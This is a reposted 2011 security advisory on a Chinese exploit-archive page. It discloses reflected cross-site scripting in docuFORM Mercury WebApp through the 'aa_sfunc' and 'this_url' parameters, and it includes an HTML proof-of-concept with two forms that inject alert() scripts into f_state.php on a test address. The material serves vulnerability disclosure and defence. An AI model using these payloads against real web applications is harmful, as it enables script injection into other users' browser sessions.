首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
docuFORM Mercury WebApp 6.16a/5.20 Multiple XSS Vulnerabilities
来源:vfocus.net 作者:LiquidWorm 发布时间:2011-04-21  

<!--


docuFORM Mercury WebApp 6.16a/5.20 Multiple Cross-Site Scripting Vulnerabilities


Vendor: docuFORM GmbH
Product web page: http://www.docuform.de
Affected version: 6.16a and 5.20

Summary: Unlimited options for production printing and customer solutions.

Desc: The Mercury Web Application suffers from multiple XSS vulnerabilities when
parsing user input thru the GET parameter 'this_url' and the POST parameter 'aa_sfunc'
in f_state.php, f_list.php, f_job.php and f_header.php scripts. Attackers can exploit
these weaknesses to execute arbitrary HTML and script code in a user's browser session.

Tested on: Mercury HTTP and Database Server 6.16

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic


Advisory ID: ZSL-2011-5010
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5010.php


14.04.2011


-->


<html><title>docuFORM Mercury WebApp 6.16a Multiple Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script><br /><br />
<form action="http://192.168.16.100:8181/Mercury/f_state.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="aa_afunc" value="call" />
<input type="hidden" name="aa_sfunc" value="1<script>alert(1)</script>" />
<input type="hidden" name="aa_cfunc" value="OnAgentGetDeviceList" />
<input type="hidden" name="aa_sfunc_args%5B%5D" value="0" /></form>
<form action="http://192.168.16.100:8181/Mercury/f_state.php" enctype="application/x-www-form-urlencoded" method="GET" id="xss2">
<input type="hidden" name="ajaxagent" value="js" />
<input type="hidden" name="this_url" value="1--><script>alert(2)</script>" /></form>
<a href="javascript:xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>'aa_sfunc' param</h3></center></font></b></a><br />
<a href="javascript:xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>'this_url' param</h3></center></font></b></a><br />
</body></html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/x86 - netcat bindshell p
·Wireshark <= 1.4.4 packet-dect
·Windows Media Player 11 .ogg P
·Gesytec ElonFmt ActiveX 1.1.14
·Media Player Classic 6.4.9.1 P
·QtWeb Browser 3.7.2 Denial Of
·Google Chrome 10.0.648.205 Sta
·KMPlayer 2.9.x (.kpl) Stack Bu
·IBM Tivoli Directory Server SA
·Spreecommerce Arbitrary Comman
·Adobe Flash Player < 10.1.53 .
·Wireshark <= 1.4.4 packet-dect
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved